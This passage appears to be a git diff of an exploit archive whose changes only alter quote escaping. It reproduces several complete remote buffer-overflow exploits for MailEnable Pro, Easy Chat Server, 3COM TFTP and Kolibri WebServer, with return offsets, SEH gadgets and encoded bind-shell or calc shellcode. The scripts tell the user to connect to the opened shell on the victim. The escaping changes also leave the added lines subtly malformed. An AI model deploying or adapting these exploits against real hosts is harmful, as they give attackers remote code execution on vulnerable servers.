+                \"\\xe2\\x48\\xe6\\x77\", # WinXP SP0 KERNEL32.dll 5.1.2600.0
+                \"\\x06\\x38\\xe6\\x77\", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
+                \"\\xd9\\xae\\x80\\x7c\", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
+                \"\\x62\\x51\\xeb\\x77\", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
+                \"\\xef\\xbe\\xad\\xde\"  # DoS
               );
 
 &print_header;
@@ -56,12 +56,12 @@ my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.709
 my $target;
 my $offset;
 
-if (defined($arg{'t'})) { $target = $arg{'t'} }
-if (defined($arg{'n'})) { $offset = $arg{'n'} }
+if (defined($arg{\'t\'})) { $target = $arg{\'t\'} }
+if (defined($arg{\'n\'})) { $offset = $arg{\'n\'} }
 if (!(defined($target))) { &usage; }
 if (!(defined($offset))) { $offset = 0; }
 if ($offset > $#offsets) {
-    print("only ".($#offsets+1)." targets known!!\n");
+    print(\"only \".($#offsets+1).\" targets known!!\\n\");
     exit(1);
 } else {
     $offset = $offsets[$offset];
@@ -70,22 +70,22 @@ if ($offset > $#offsets) {
 my $imapd_port = 143;
 my $send_delay = 1;
 
-my $NOP = 'A';
+my $NOP = \'A\';
 my $START_PAD = 547;
 my $SHELL_PAD = 12;
 
 if (connect_host($target, $imapd_port)) {
-    print("-> * Connected\n");
-    $buf = "A001 LOGIN \{24\}";
-    send(SOCKET, $buf."\r\n", 0);
+    print(\"-> * Connected\\n\");
+    $buf = \"A001 LOGIN \\{24\\}\";
+    send(SOCKET, $buf.\"\\r\\n\", 0);
     sleep($send_delay);
 
-    print("-> * Sending payload\n");
+    print(\"-> * Sending payload\\n\");
 
-    send(SOCKET, "AAAAAAAAAAAAAAAAA\{20\}\r\n", 0);
+    send(SOCKET, \"AAAAAAAAAAAAAAAAA\\{20\\}\\r\\n\", 0);
     sleep($send_delay);
 
-    send(SOCKET, "BBBBBBBBBBBBBBBBBB\r\n", 0);
+    send(SOCKET, \"BBBBBBBBBBBBBBBBBB\\r\\n\", 0);
     sleep($send_delay);
 
     $buf = ($NOP x $START_PAD).# padding
@@ -95,13 +95,13 @@ if (connect_host($target, $imapd_port)) {
            ($NOP x (0x3ff-$START_PAD-$SHELL_PAD-4-length($zshell_win32_bind)));
     send(SOCKET, $buf, 0);
 
-    print("-> * Successfully sent payload!\n");
-    print("-> * nc ".$target." 1337 for shell...\n");
+    print(\"-> * Successfully sent payload!\\n\");
+    print(\"-> * nc \".$target.\" 1337 for shell...\\n\");
 }
 
 sub print_header {
-    print("MailEnable Pro <=v2.35 remote exploit\n");
-    print("by: <mu-b\@digit-labs.org>\n\n");
+    print(\"MailEnable Pro <=v2.35 remote exploit\\n\");
+    print(\"by: <mu-b\\@digit-labs.org>\\n\\n\");
 }
 
 sub usage {
@@ -116,12 +116,12 @@ sub usage {
 
 sub connect_host {
     ($target, $port) = @_;
-    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
-    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
-    $proto  = getprotobyname('tcp')              || die("Error: $!\n");
+    $iaddr  = inet_aton($target)                 || die(\"Error: $!\\n\");
+    $paddr  = sockaddr_in($port, $iaddr)         || die(\"Error: $!\\n\");
+    $proto  = getprotobyname(\'tcp\')              || die(\"Error: $!\\n\");
 
-    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
-    connect(SOCKET, $paddr)                      || die("Error: $!\n");
+    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!\\n\");
+    connect(SOCKET, $paddr)                      || die(\"Error: $!\\n\");
     return(1338);
 }
 
diff --git a/platforms/windows/remote/33326.py b/platforms/windows/remote/33326.py
index 72803611f..10dbee547 100755
--- a/platforms/windows/remote/33326.py
+++ b/platforms/windows/remote/33326.py
@@ -1,6 +1,6 @@
 ## Exploit-DB Note: The offset to SEH is influenced by the installation path of the program.
 ## For this specific exploit to work, easy chat must be installed to:
-## 'C:\Program Files\EFS Software\Easy Chat Server'
+## \'C:\\Program Files\\EFS Software\\Easy Chat Server\'
 
 
 # Exploit Title: Easy Chat Server 3.1 stack buffer overflow
@@ -19,39 +19,39 @@ import socket
 import struct
 
 # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
-# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin 
+# msfencode -b \"\\x00\\x20\" -i w32-exec-calc-shellcode.bin 
 # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
 shellcode = ( 
-"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
-"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
-"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
-"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
-"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
-"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
-"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
-"\x1c\x39\xbd"
+\"\\xd9\\xcb\\xbe\\xb9\\x23\\x67\\x31\\xd9\\x74\\x24\\xf4\\x5a\\x29\\xc9\" +
+\"\\xb1\\x13\\x31\\x72\\x19\\x83\\xc2\\x04\\x03\\x72\\x15\\x5b\\xd6\\x56\" +
+\"\\xe3\\xc9\\x71\\xfa\\x62\\x81\\xe2\\x75\\x82\\x0b\\xb3\\xe1\\xc0\\xd9\" +
+\"\\x0b\\x61\\xa0\\x11\\xe7\\x03\\x41\\x84\\x7c\\xdb\\xd2\\xa8\\x9a\\x97\" +
+\"\\xba\\x68\\x10\\xfb\\x5b\\xe8\\xad\\x70\\x7b\\x28\\xb3\\x86\\x08\\x64\" +
+\"\\xac\\x52\\x0e\\x8d\\xdd\\x2d\\x3c\\x3c\\xa0\\xfc\\xbc\\x82\\x23\\xa8\" +
+\"\\xd7\\x94\\x6e\\x23\\xd9\\xe3\\x05\\xd4\\x05\\xf2\\x1b\\xe9\\x09\\x5a\" +
+\"\\x1c\\x39\\xbd\"
 )
 
 # SEH overwritten at offset 207 when Easy Chat Server is  
-# installed in C:\Program Files\EFS Software\Easy Chat Server
-payload =  "A"*203
-payload += "\xeb\x06\x90\x90"           # short jmp to shellcode
-payload += "\x1e\x0e\x01\x10"           # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL
-payload += "\x81\xc4\xd8\xfe\xff\xff"   # add esp,-128
+# installed in C:\\Program Files\\EFS Software\\Easy Chat Server
+payload =  \"A\"*203
+payload += \"\\xeb\\x06\\x90\\x90\"           # short jmp to shellcode
+payload += \"\\x1e\\x0e\\x01\\x10\"           # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL
+payload += \"\\x81\\xc4\\xd8\\xfe\\xff\\xff\"   # add esp,-128
 payload += shellcode                    # calc.exe
-payload += "D"*193
+payload += \"D\"*193
 
 buf = (
-"GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
-"User-Agent: Mozilla/4.0\r\n"
-"Host: 192.168.1.136:80\r\n"
-"Accept-Language: en-us\r\n"
-"Accept-Encoding: gzip, deflate\r\n"
-"Referer: http://192.168.1.136\r\n"
-"Connection: Keep-Alive\r\n\r\n"
+\"GET /chat.ghp?username=\" + payload + \"&password=&room=1&sex=1 HTTP/1.1\\r\\n\"
+\"User-Agent: Mozilla/4.0\\r\\n\"
+\"Host: 192.168.1.136:80\\r\\n\"
+\"Accept-Language: en-us\\r\\n\"
+\"Accept-Encoding: gzip, deflate\\r\\n\"
+\"Referer: http://192.168.1.136\\r\\n\"
+\"Connection: Keep-Alive\\r\\n\\r\\n\"
 )
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-s.connect(("192.168.123.131", 80))
+s.connect((\"192.168.123.131\", 80))
 s.send(buf)
 print s.recv(1024)
diff --git a/platforms/windows/remote/3388.pl b/platforms/windows/remote/3388.pl
index 9e79a8f5a..aea721cbe 100755
--- a/platforms/windows/remote/3388.pl
+++ b/platforms/windows/remote/3388.pl
@@ -19,7 +19,7 @@
 # 
 # So here you go.
 #
-# Buffer = "\x00\x02"      +  "filename"    +  "\x00" +  nop sled +  Shellcode + JUMP  + "\x00";
+# Buffer = \"\\x00\\x02\"      +  \"filename\"    +  \"\\x00\" +  nop sled +  Shellcode + JUMP  + \"\\x00\";
 # 
 #
 # This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage.
@@ -30,61 +30,61 @@ use IO::Socket;
 
 if(!($ARGV[1]))
 {
- print "\n3COM Tftp long transport name exploit\n";
- print "\tCoded by Umesh wanve\n\n";
- print "Use: 3com_tftp.pl <host> <port>\n\n";
+ print \"\\n3COM Tftp long transport name exploit\\n\";
+ print \"\\tCoded by Umesh wanve\\n\\n\";
+ print \"Use: 3com_tftp.pl <host> <port>\\n\\n\";
  exit;
 }
 
 
-$target = IO::Socket::INET->new(Proto=>'udp',
+$target = IO::Socket::INET->new(Proto=>\'udp\',
                                 PeerAddr=>$ARGV[0],
                                 PeerPort=>$ARGV[1])
-                            or die "Cannot connect to $ARGV[0] on port $ARGV[1]";
+                            or die \"Cannot connect to $ARGV[0] on port $ARGV[1]\";
 
 
 
 # win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
  
 my($shellcode)=
-"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x48".
-"\xc8\xb3\x54\x83\xeb\xfc\xe2\xf4\xb4\xa2\x58\x19\xa0\x31\x4c\xab".
-"\xb7\xa8\x38\x38\x6c\xec\x38\x11\x74\x43\xcf\x51\x30\xc9\x5c\xdf".
-"\x07\xd0\x38\x0b\x68\xc9\x58\x1d\xc3\xfc\x38\x55\xa6\xf9\x73\xcd".
-"\xe4\x4c\x73\x20\x4f\x09\x79\x59\x49\x0a\x58\xa0\x73\x9c\x97\x7c".
-"\x3d\x2d\x38\x0b\x6c\xc9\x58\x32\xc3\xc4\xf8\xdf\x17\xd4\xb2\xbf".
-"\x4b\xe4\x38\xdd\x24\xec\xaf\x35\x8b\xf9\x68\x30\xc3\x8b\x83\xdf".
-"\x08\xc4\x38\x24\x54\x65\x38\x14\x40\x96\xdb\xda\x06\xc6\x5f\x04".
-"\xb7\x1e\xd5\x07\x2e\xa0\x80\x66\x20\xbf\xc0\x66\x17\x9c\x4c\x84".
-"\x20\x03\x5e\xa8\x73\x98\x4c\x82\x17\x41\x56\x32\xc9\x25\xbb\x56".
-"\x1d\xa2\xb1\xab\x98\xa0\x6a\x5d\xbd\x65\xe4\xab\x9e\x9b\xe0\x07".
-"\x1b\x9b\xf0\x07\x0b\x9b\x4c\x84\x2e\xa0\xa2\x08\x2e\x9b\x3a\xb5".
-"\xdd\xa0\x17\x4e\x38\x0f\xe4\xab\x9e\xa2\xa3\x05\x1d\x37\x63\x3c".
-"\xec\x65\x9d\xbd\x1f\x37\x65\x07\x1d\x37\x63\x3c\xad\x81\x35\x1d".
-"\x1f\x37\x65\x04\x1c\x9c\xe6\xab\x98\x5b\xdb\xb3\x31\x0e\xca\x03".
-"\xb7\x1e\xe6\xab\x98\xae\xd9\x30\x2e\xa0\xd0\x39\xc1\x2d\xd9\x04".
-"\x11\xe1\x7f\xdd\xaf\xa2\xf7\xdd\xaa\xf9\x73\xa7\xe2\x36\xf1\x79".
-"\xb6\x8a\x9f\xc7\xc5\xb2\x8b\xff\xe3\x63\xdb\x26\xb6\x7b\xa5\xab".
-"\x3d\x8c\x4c\x82\x13\x9f\xe1\x05\x19\x99\xd9\x55\x19\x99\xe6\x05".
-"\xb7\x18\xdb\xf9\x91\xcd\x7d\x07\xb7\x1e\xd9\xab\xb7\xff\x4c\x84".
-"\xc3\x9f\x4f\xd7\x8c\xac\x4c\x82\x1a\x37\x63\x3c\xb8\x42\xb7\x0b".
-"\x1b\x37\x65\xab\x98\xc8\xb3\x54";
+\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x48\".
+\"\\xc8\\xb3\\x54\\x83\\xeb\\xfc\\xe2\\xf4\\xb4\\xa2\\x58\\x19\\xa0\\x31\\x4c\\xab\".
+\"\\xb7\\xa8\\x38\\x38\\x6c\\xec\\x38\\x11\\x74\\x43\\xcf\\x51\\x30\\xc9\\x5c\\xdf\".
+\"\\x07\\xd0\\x38\\x0b\\x68\\xc9\\x58\\x1d\\xc3\\xfc\\x38\\x55\\xa6\\xf9\\x73\\xcd\".
+\"\\xe4\\x4c\\x73\\x20\\x4f\\x09\\x79\\x59\\x49\\x0a\\x58\\xa0\\x73\\x9c\\x97\\x7c\".
+\"\\x3d\\x2d\\x38\\x0b\\x6c\\xc9\\x58\\x32\\xc3\\xc4\\xf8\\xdf\\x17\\xd4\\xb2\\xbf\".
+\"\\x4b\\xe4\\x38\\xdd\\x24\\xec\\xaf\\x35\\x8b\\xf9\\x68\\x30\\xc3\\x8b\\x83\\xdf\".
+\"\\x08\\xc4\\x38\\x24\\x54\\x65\\x38\\x14\\x40\\x96\\xdb\\xda\\x06\\xc6\\x5f\\x04\".
+\"\\xb7\\x1e\\xd5\\x07\\x2e\\xa0\\x80\\x66\\x20\\xbf\\xc0\\x66\\x17\\x9c\\x4c\\x84\".
+\"\\x20\\x03\\x5e\\xa8\\x73\\x98\\x4c\\x82\\x17\\x41\\x56\\x32\\xc9\\x25\\xbb\\x56\".
+\"\\x1d\\xa2\\xb1\\xab\\x98\\xa0\\x6a\\x5d\\xbd\\x65\\xe4\\xab\\x9e\\x9b\\xe0\\x07\".
+\"\\x1b\\x9b\\xf0\\x07\\x0b\\x9b\\x4c\\x84\\x2e\\xa0\\xa2\\x08\\x2e\\x9b\\x3a\\xb5\".
+\"\\xdd\\xa0\\x17\\x4e\\x38\\x0f\\xe4\\xab\\x9e\\xa2\\xa3\\x05\\x1d\\x37\\x63\\x3c\".
+\"\\xec\\x65\\x9d\\xbd\\x1f\\x37\\x65\\x07\\x1d\\x37\\x63\\x3c\\xad\\x81\\x35\\x1d\".
+\"\\x1f\\x37\\x65\\x04\\x1c\\x9c\\xe6\\xab\\x98\\x5b\\xdb\\xb3\\x31\\x0e\\xca\\x03\".
+\"\\xb7\\x1e\\xe6\\xab\\x98\\xae\\xd9\\x30\\x2e\\xa0\\xd0\\x39\\xc1\\x2d\\xd9\\x04\".
+\"\\x11\\xe1\\x7f\\xdd\\xaf\\xa2\\xf7\\xdd\\xaa\\xf9\\x73\\xa7\\xe2\\x36\\xf1\\x79\".
+\"\\xb6\\x8a\\x9f\\xc7\\xc5\\xb2\\x8b\\xff\\xe3\\x63\\xdb\\x26\\xb6\\x7b\\xa5\\xab\".
+\"\\x3d\\x8c\\x4c\\x82\\x13\\x9f\\xe1\\x05\\x19\\x99\\xd9\\x55\\x19\\x99\\xe6\\x05\".
+\"\\xb7\\x18\\xdb\\xf9\\x91\\xcd\\x7d\\x07\\xb7\\x1e\\xd9\\xab\\xb7\\xff\\x4c\\x84\".
+\"\\xc3\\x9f\\x4f\\xd7\\x8c\\xac\\x4c\\x82\\x1a\\x37\\x63\\x3c\\xb8\\x42\\xb7\\x0b\".
+\"\\x1b\\x37\\x65\\xab\\x98\\xc8\\xb3\\x54\";
 
 
 
-print "++ Building Malicous Packet .....\n";
+print \"++ Building Malicous Packet .....\\n\";
 
-$nop="\x90" x 129;  
+$nop=\"\\x90\" x 129;  
 
 
-$jmp_2000 = "\x0e\x08\xe5\x77";                              # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007)
+$jmp_2000 = \"\\x0e\\x08\\xe5\\x77\";                              # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007)
 
 
-$exploit = "\x00\x02";                                      #write request (header)
+$exploit = \"\\x00\\x02\";                                      #write request (header)
 
-$exploit=$exploit."A";                                      #file name   
+$exploit=$exploit.\"A\";                                      #file name   
 
-$exploit=$exploit."\x00";                                   #Start of transporting name
+$exploit=$exploit.\"\\x00\";                                   #Start of transporting name
 
 $exploit=$exploit.$nop;                                     #nop sled to land into shellcode 
 
@@ -92,17 +92,17 @@ $exploit=$exploit.$shellcode;                               #our Hell code
 
 $exploit=$exploit.$jmp_2000;                               #jump to shellcode 
 
-$exploit=$exploit."\x00";                                   #end of TS mode name
+$exploit=$exploit.\"\\x00\";                                   #end of TS mode name
 
 
 
 print $target $exploit;                                     #Attack on victim
 
-print "++ Exploit packet sent ...\n";
+print \"++ Exploit packet sent ...\\n\";
 
-print "++ Done.\n";
+print \"++ Done.\\n\";
 
-print "++ Telnet to 4444 on victim's machine ....\n";
+print \"++ Telnet to 4444 on victim\'s machine ....\\n\";
 sleep(2);
 
 
diff --git a/platforms/windows/remote/34059.py b/platforms/windows/remote/34059.py
index e8370cb02..ddc10ee3b 100755
--- a/platforms/windows/remote/34059.py
+++ b/platforms/windows/remote/34059.py
@@ -7,13 +7,13 @@
 # Tested on 		: Windows XP SP2 Eng, Windows Server 2003 Eng, Win 7 SP1 Eng
 import socket, sys
 
-help = """Kolibri WebServer 2.0 Get Request SEH Exploit
+help = \"\"\"Kolibri WebServer 2.0 Get Request SEH Exploit
 
 Target
 [1]Windows XP SP2 Eng & Windows 2003 SP2 Eng
 [2]Windows 7 SP1 Eng
 
-Usage : %s [rhost] [port] [target]""" %sys.argv[0]
+Usage : %s [rhost] [port] [target]\"\"\" %sys.argv[0]
 
 try:
 	script, rhost, port, target = sys.argv
@@ -25,94 +25,94 @@ try:
 	port = int(port)
 	target = int(target)
 except ValueError:
-	print "Port & Target should number !"
+	print \"Port & Target should number !\"
 	exit() 
 
 #msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_mixed -t c
-shellcode = ("\x89\xe2\xd9\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
-"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
-"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-"\x39\x6c\x79\x78\x6f\x79\x75\x50\x57\x70\x53\x30\x65\x30\x6f"
-"\x79\x68\x65\x50\x31\x69\x42\x71\x74\x6c\x4b\x43\x62\x46\x50"
-"\x6e\x6b\x61\x42\x74\x4c\x6c\x4b\x66\x32\x35\x44\x4e\x6b\x33"
-"\x42\x64\x68\x66\x6f\x6c\x77\x51\x5a\x37\x56\x75\x61\x79\x6f"
-"\x30\x31\x49\x50\x6e\x4c\x65\x6c\x73\x51\x53\x4c\x45\x52\x46"
-"\x4c\x67\x50\x49\x51\x48\x4f\x56\x6d\x53\x31\x38\x47\x39\x72"
-"\x4a\x50\x72\x72\x36\x37\x4e\x6b\x62\x72\x54\x50\x6c\x4b\x43"
-"\x72\x55\x6c\x36\x61\x6e\x30\x6e\x6b\x33\x70\x72\x58\x6e\x65"
-"\x39\x50\x52\x54\x50\x4a\x47\x71\x6e\x30\x32\x70\x4c\x4b\x72"
-"\x68\x35\x48\x4e\x6b\x50\x58\x45\x70\x45\x51\x4e\x33\x6d\x33"
-"\x35\x6c\x43\x79\x4c\x4b\x64\x74\x4c\x4b\x57\x71\x49\x46\x55"
-"\x61\x79\x6f\x50\x31\x6f\x30\x4e\x4c\x39\x51\x48\x4f\x44\x4d"
-"\x37\x71\x59\x57\x64\x78\x79\x70\x53\x45\x69\x64\x76\x63\x33"
-"\x4d\x79\x68\x37\x4b\x53\x4d\x45\x74\x30\x75\x58\x62\x30\x58"
-"\x4c\x4b\x31\x48\x67\x54\x36\x61\x78\x53\x53\x56\x6c\x4b\x74"
-"\x4c\x50\x4b\x4c\x4b\x53\x68\x47\x6c\x36\x61\x48\x53\x6c\x4b"
-"\x76\x64\x4c\x4b\x73\x31\x4a\x70\x4b\x39\x33\x74\x61\x34\x47"
-"\x54\x33\x6b\x71\x4b\x70\x61\x50\x59\x52\x7a\x50\x51\x4b\x4f"
-"\x6d\x30\x31\x48\x43\x6f\x53\x6a\x6c\x4b\x66\x72\x38\x6b\x6c"
-"\x46\x53\x6d\x70\x68\x34\x73\x36\x52\x33\x30\x53\x30\x52\x48"
-"\x72\x57\x50\x73\x45\x62\x53\x6f\x76\x34\x51\x78\x72\x6c\x62"
-"\x57\x46\x46\x47\x77\x79\x6f\x78\x55\x78\x38\x4e\x70\x35\x51"
-"\x45\x50\x53\x30\x35\x79\x6a\x64\x31\x44\x76\x30\x71\x78\x61"
-"\x39\x6d\x50\x50\x6b\x35\x50\x49\x6f\x6a\x75\x32\x70\x30\x50"
-"\x72\x70\x66\x30\x61\x50\x36\x30\x31\x50\x50\x50\x51\x78\x68"
-"\x6a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x38\x55\x4b\x39\x38\x47"
-"\x44\x71\x79\x4b\x43\x63\x31\x78\x37\x72\x67\x70\x52\x36\x47"
-"\x32\x6f\x79\x4a\x46\x72\x4a\x72\x30\x46\x36\x50\x57\x52\x48"
-"\x79\x52\x79\x4b\x74\x77\x30\x67\x59\x6f\x58\x55\x46\x33\x61"
-"\x47\x53\x58\x6e\x57\x69\x79\x65\x68\x59\x6f\x59\x6f\x69\x45"
-"\x46\x33\x30\x53\x76\x37\x50\x68\x74\x34\x78\x6c\x47\x4b\x48"
-"\x61\x6b\x4f\x4a\x75\x43\x67\x4d\x59\x38\x47\x65\x38\x61\x65"
-"\x70\x6e\x70\x4d\x61\x71\x79\x6f\x39\x45\x70\x68\x31\x73\x50"
-"\x6d\x31\x74\x67\x70\x6f\x79\x39\x73\x32\x77\x52\x77\x70\x57"
-"\x66\x51\x68\x76\x73\x5a\x54\x52\x46\x39\x63\x66\x69\x72\x69"
-"\x6d\x61\x76\x4a\x67\x33\x74\x76\x44\x65\x6c\x55\x51\x73\x31"
-"\x6c\x4d\x43\x74\x31\x34\x32\x30\x4a\x66\x67\x70\x57\x34\x56"
-"\x34\x36\x30\x30\x56\x56\x36\x30\x56\x43\x76\x42\x76\x32\x6e"
-"\x71\x46\x36\x36\x70\x53\x46\x36\x55\x38\x33\x49\x78\x4c\x37"
-"\x4f\x6b\x36\x49\x6f\x49\x45\x4b\x39\x59\x70\x50\x4e\x31\x46"
-"\x50\x46\x49\x6f\x50\x30\x42\x48\x36\x68\x4e\x67\x35\x4d\x73"
-"\x50\x6b\x4f\x59\x45\x6f\x4b\x4c\x30\x48\x35\x4f\x52\x33\x66"
-"\x63\x58\x6d\x76\x5a\x35\x6f\x4d\x6f\x6d\x69\x6f\x58\x55\x77"
-"\x4c\x63\x36\x33\x4c\x56\x6a\x6b\x30\x69\x6b\x4d\x30\x53\x45"
-"\x45\x55\x4f\x4b\x70\x47\x52\x33\x44\x32\x52\x4f\x51\x7a\x63"
-"\x30\x66\x33\x6b\x4f\x78\x55\x41\x41")
+shellcode = (\"\\x89\\xe2\\xd9\\xc4\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\\x49\"
+\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\"
+\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\"
+\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\"
+\"\\x39\\x6c\\x79\\x78\\x6f\\x79\\x75\\x50\\x57\\x70\\x53\\x30\\x65\\x30\\x6f\"
+\"\\x79\\x68\\x65\\x50\\x31\\x69\\x42\\x71\\x74\\x6c\\x4b\\x43\\x62\\x46\\x50\"
+\"\\x6e\\x6b\\x61\\x42\\x74\\x4c\\x6c\\x4b\\x66\\x32\\x35\\x44\\x4e\\x6b\\x33\"
+\"\\x42\\x64\\x68\\x66\\x6f\\x6c\\x77\\x51\\x5a\\x37\\x56\\x75\\x61\\x79\\x6f\"
+\"\\x30\\x31\\x49\\x50\\x6e\\x4c\\x65\\x6c\\x73\\x51\\x53\\x4c\\x45\\x52\\x46\"
+\"\\x4c\\x67\\x50\\x49\\x51\\x48\\x4f\\x56\\x6d\\x53\\x31\\x38\\x47\\x39\\x72\"
+\"\\x4a\\x50\\x72\\x72\\x36\\x37\\x4e\\x6b\\x62\\x72\\x54\\x50\\x6c\\x4b\\x43\"
+\"\\x72\\x55\\x6c\\x36\\x61\\x6e\\x30\\x6e\\x6b\\x33\\x70\\x72\\x58\\x6e\\x65\"
+\"\\x39\\x50\\x52\\x54\\x50\\x4a\\x47\\x71\\x6e\\x30\\x32\\x70\\x4c\\x4b\\x72\"
+\"\\x68\\x35\\x48\\x4e\\x6b\\x50\\x58\\x45\\x70\\x45\\x51\\x4e\\x33\\x6d\\x33\"
+\"\\x35\\x6c\\x43\\x79\\x4c\\x4b\\x64\\x74\\x4c\\x4b\\x57\\x71\\x49\\x46\\x55\"
+\"\\x61\\x79\\x6f\\x50\\x31\\x6f\\x30\\x4e\\x4c\\x39\\x51\\x48\\x4f\\x44\\x4d\"
+\"\\x37\\x71\\x59\\x57\\x64\\x78\\x79\\x70\\x53\\x45\\x69\\x64\\x76\\x63\\x33\"
+\"\\x4d\\x79\\x68\\x37\\x4b\\x53\\x4d\\x45\\x74\\x30\\x75\\x58\\x62\\x30\\x58\"
+\"\\x4c\\x4b\\x31\\x48\\x67\\x54\\x36\\x61\\x78\\x53\\x53\\x56\\x6c\\x4b\\x74\"
+\"\\x4c\\x50\\x4b\\x4c\\x4b\\x53\\x68\\x47\\x6c\\x36\\x61\\x48\\x53\\x6c\\x4b\"
+\"\\x76\\x64\\x4c\\x4b\\x73\\x31\\x4a\\x70\\x4b\\x39\\x33\\x74\\x61\\x34\\x47\"
+\"\\x54\\x33\\x6b\\x71\\x4b\\x70\\x61\\x50\\x59\\x52\\x7a\\x50\\x51\\x4b\\x4f\"
+\"\\x6d\\x30\\x31\\x48\\x43\\x6f\\x53\\x6a\\x6c\\x4b\\x66\\x72\\x38\\x6b\\x6c\"
+\"\\x46\\x53\\x6d\\x70\\x68\\x34\\x73\\x36\\x52\\x33\\x30\\x53\\x30\\x52\\x48\"
+\"\\x72\\x57\\x50\\x73\\x45\\x62\\x53\\x6f\\x76\\x34\\x51\\x78\\x72\\x6c\\x62\"
+\"\\x57\\x46\\x46\\x47\\x77\\x79\\x6f\\x78\\x55\\x78\\x38\\x4e\\x70\\x35\\x51\"
+\"\\x45\\x50\\x53\\x30\\x35\\x79\\x6a\\x64\\x31\\x44\\x76\\x30\\x71\\x78\\x61\"
+\"\\x39\\x6d\\x50\\x50\\x6b\\x35\\x50\\x49\\x6f\\x6a\\x75\\x32\\x70\\x30\\x50\"
+\"\\x72\\x70\\x66\\x30\\x61\\x50\\x36\\x30\\x31\\x50\\x50\\x50\\x51\\x78\\x68\"
+\"\\x6a\\x64\\x4f\\x69\\x4f\\x59\\x70\\x4b\\x4f\\x38\\x55\\x4b\\x39\\x38\\x47\"
+\"\\x44\\x71\\x79\\x4b\\x43\\x63\\x31\\x78\\x37\\x72\\x67\\x70\\x52\\x36\\x47\"
+\"\\x32\\x6f\\x79\\x4a\\x46\\x72\\x4a\\x72\\x30\\x46\\x36\\x50\\x57\\x52\\x48\"
+\"\\x79\\x52\\x79\\x4b\\x74\\x77\\x30\\x67\\x59\\x6f\\x58\\x55\\x46\\x33\\x61\"
+\"\\x47\\x53\\x58\\x6e\\x57\\x69\\x79\\x65\\x68\\x59\\x6f\\x59\\x6f\\x69\\x45\"
+\"\\x46\\x33\\x30\\x53\\x76\\x37\\x50\\x68\\x74\\x34\\x78\\x6c\\x47\\x4b\\x48\"
+\"\\x61\\x6b\\x4f\\x4a\\x75\\x43\\x67\\x4d\\x59\\x38\\x47\\x65\\x38\\x61\\x65\"
+\"\\x70\\x6e\\x70\\x4d\\x61\\x71\\x79\\x6f\\x39\\x45\\x70\\x68\\x31\\x73\\x50\"
+\"\\x6d\\x31\\x74\\x67\\x70\\x6f\\x79\\x39\\x73\\x32\\x77\\x52\\x77\\x70\\x57\"
+\"\\x66\\x51\\x68\\x76\\x73\\x5a\\x54\\x52\\x46\\x39\\x63\\x66\\x69\\x72\\x69\"
+\"\\x6d\\x61\\x76\\x4a\\x67\\x33\\x74\\x76\\x44\\x65\\x6c\\x55\\x51\\x73\\x31\"
+\"\\x6c\\x4d\\x43\\x74\\x31\\x34\\x32\\x30\\x4a\\x66\\x67\\x70\\x57\\x34\\x56\"
+\"\\x34\\x36\\x30\\x30\\x56\\x56\\x36\\x30\\x56\\x43\\x76\\x42\\x76\\x32\\x6e\"
+\"\\x71\\x46\\x36\\x36\\x70\\x53\\x46\\x36\\x55\\x38\\x33\\x49\\x78\\x4c\\x37\"
+\"\\x4f\\x6b\\x36\\x49\\x6f\\x49\\x45\\x4b\\x39\\x59\\x70\\x50\\x4e\\x31\\x46\"
+\"\\x50\\x46\\x49\\x6f\\x50\\x30\\x42\\x48\\x36\\x68\\x4e\\x67\\x35\\x4d\\x73\"
+\"\\x50\\x6b\\x4f\\x59\\x45\\x6f\\x4b\\x4c\\x30\\x48\\x35\\x4f\\x52\\x33\\x66\"
